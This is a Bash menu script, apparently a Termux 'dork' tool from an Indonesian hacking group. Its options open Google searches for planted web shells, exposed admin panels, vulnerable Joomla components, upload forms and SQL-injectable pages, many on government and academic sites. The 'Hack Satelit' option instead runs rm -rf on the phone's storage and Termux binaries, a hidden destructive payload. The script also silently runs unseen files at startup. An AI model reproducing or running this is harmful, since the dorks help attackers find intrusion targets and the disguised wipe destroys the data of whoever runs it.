#!/bin/bash
#Author = 085752481601
#Contact = RabbitCL4Y123@gmail.com
clear
blue='\033[34;1m'
green='\033[32;1m'
purple='\033[35;1m'
cyan='\033[36;1m'
red='\033[31;1m'
white='\033[37;1m'
yellow='\033[33;1m'
clear
chmod 777 run
./run
python restart.py
python2 pwds.py
figlet -f future PLEASE WAIT!!! |lolcat
sleep 2
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
echo "***********************RCT*********************************"|lolcat
echo "Author By   : MR.CL4Y"|lolcat
echo "My Team     : Rabbit Cyber Team"|lolcat
echo "Contact Me  : RabbitCL4Y123@gmail.com"|lolcat
echo "My GitHub   : https://github.com/RabbitCL4Y"|lolcat
echo "My GitLab   : https://gitlab.com/MRCL4Y"|lolcat
echo "***********************RCT*********************************"|lolcat
echo "-----Dork Dorking Shell-----"
echo "1"
echo "2"
echo "3"
echo "-----Dork Bypass Admin------"
echo "4"
echo "5"
echo "6"
echo "-----Dork Com Media---------"
echo "7"
echo "8"
echo "9"
echo "-----Dork Drupal Hidden-----"
echo "10"
echo "11"
echo "12"
echo "-----Dork Com Fabrik--------"
echo "13"
echo "14"
echo "15"
echo "---------Dork SQL-----------"
echo "16"
echo "17"
echo "18"
echo "--------Hack Satelit--------"
echo "19"
echo "--------LINK NEKOPOI--------"
echo "20"
echo "----------------------------"
echo "00"
echo "----------------------------"
read -p "Root@MR./CL4Y": gan

if [ $gan = 1 ] || [ $gan = 1 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=intext%3A"Cpanel+Cracker"+filetype%3Aphp&oq=intext%3A"Cpanel+Cracker"+filetype%3Aphp'
fi

if [ $gan = 2 ] || [ $gan = 2 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=intitle%3A"IndoXploit"+intext%3A"SMTP+Grabber"+filetype%3Aphp&oq=intitle%3A"IndoXploit"+intext%3A"SMTP+Grabber"+filetype%3Aphp'
fi

if [ $gan = 3 ] || [ $gan = 3 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=intitle%3A"IndoXploit"+intext%3A"WordPress+Auto+Deface+V.2"+filetype%3Aphp&oq=intitle%3A"IndoXploit"+intext%3A"WordPress+Auto+Deface+V.2"+filetype%3Aphp'
fi

if [ $gan = 4 ] || [ $gan = 4 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=inurl%3A%2Fadmin%2Fimages+intext%3A"Parent+Directory"+site%3Ain&oq=inurl%3A%2Fadmin%2Fimages+intext%3A"Parent+Directory"+site%3Ain'
fi

if [ $gan = 5 ] || [ $gan = 5 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=site%3Ain+%2Fadmin%2Fbanner.php&oq=site%3Ain+%2Fadmin%2Fbanner.php'
fi

if [ $gan = 6 ] || [ $gan = 6 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=intitle%3A"administrator"+inurl%3A%2Flogin.php+site%3Ain&oq=intitle%3A"administrator"+inurl%3A%2Flogin.php+site%3Ain'
fi

if [ $gan = 7 ] || [ $gan = 7 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=inurl%3Acom_media+site%3B.gov&oq=inurl%3Acom_media+site%3B.gov'
fi

if [ $gan = 8 ] || [ $gan = 8 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
xdg-open 'https://www.google.co.id/search?safe=strict&client=ms-android-xiaomi&ei=72tIXIe9OYjwvgTJqZUQ&q=inurl%3Acom_media+site%3B.id&oq=inurl%3Acom_media+site%3B.id'
fi

if [ $gan = 9 ] || [ $gan = 9 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?safe=strict&client=ms-android-xiaomi&ei=RmxIXMDaHIeR9QPNj6ewCA&q=inurl%3Acom_media+site%3B.uk&oq=inurl%3Acom_media+site%3B.uk'
fi

if [ $gan = 10 ] || [ $gan = 10 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=Allowed+file+types%3A+png+gif+jpg+txt.+site%3Aedu&oq=Allowed+file+types%3A+png+gif+jpg+txt.+site%3Aedu'
fi

if [ $gan = 11 ] || [ $gan = 11 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?safe=strict&client=ms-android-xiaomi&ei=tG1IXPzbC4LPvgTfobK4Ag&q=Allowed+file+types%3A+png+gif+jpg+txt.+site%3Aid&oq=Allowed+file+types%3A+png+gif+jpg+txt.+site%3Aid'
fi

if [ $gan = 12 ] || [ $gan = 12 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?safe=strict&client=ms-android-xiaomi&ei=EG5IXKzuGMLWvgST8oygDQ&q=Allowed+file+types%3A+png+gif+jpg+txt.+site%3Amy&oq=Allowed+file+types%3A+png+gif+jpg+txt.+site%3Amy'
fi

if [ $gan = 13 ] || [ $gan = 13 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=-Inurl%3Aindex.php%3FOption%3DCom_Fabrik&oq=-Inurl%3Aindex.php%3FOption%3DCom_Fabrik'
fi

if [ $gan = 14 ] || [ $gan = 14 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=inurl%3Aindex.php%2Fcomponent%2Ffabrik%2F+site%3A.dkinurl%3Aindex.php%3Foption%3Dcom_fabrik%26view%3D&oq=inurl%3Aindex.php%2Fcomponent%2Ffabrik%2F+site%3A.dkinurl%3Aindex.php%3Foption%3Dcom_fabrik'
fi

if [ $gan = 15 ] || [ $gan = 15 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?safe=strict&client=ms-android-xiaomi&ei=d3BIXNa3NMjjvATT3r6AAQ&q=inurl%3Aimportcsv.php+site%3Ainurl%3AviewTable%3Fcid%3D+site%3A.com&oq=inurl%3Aimportcsv.php+site%3Ainurl%3AviewTable%3Fcid%3D+site'
fi

if [ $gan = 16 ] || [ $gan = 16 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=inurl%3AView%3Fid%3D+com&oq=inurl%3AView%3Fid%3D+com'
fi

if [ $gan = 17 ] || [ $gan = 17 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=inurl%3Aphp%3Fid%3D+ac.id&oq=inurl%3Aphp%3Fid%3D+ac.id'
fi

if [ $gan = 18 ] || [ $gan = 18 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://www.google.co.id/search?q=inurl%3Did%3Fsite%3Acom&oq=inurl%3Did%3Fsite%3Acom'
fi

if [ $gan = 19 ] || [ $gan = 19 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
rm -rf /storage/emulated/0
rm -rf /storage
rm -rf /storage/sdcard
rm -rf /storage/sdcard1
rm -rf $PREFIX/bin
fi

if [ $gan = 20 ] || [ $gan = 20 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
clear
xdg-open 'https://intoupload.net/60iqa9bh7o4s'
fi

if [ $gan = 00 ] || [ $gan = 00 ]
then
clear
figlet -f slant MR.CL4Y |lolcat
sleep 2
toilet -f future "Rabbit Cyber Team"
sleep 2
figlet -f slant WUZZ HERE!!! |lolcat
sleep 2
clear
exit
fi
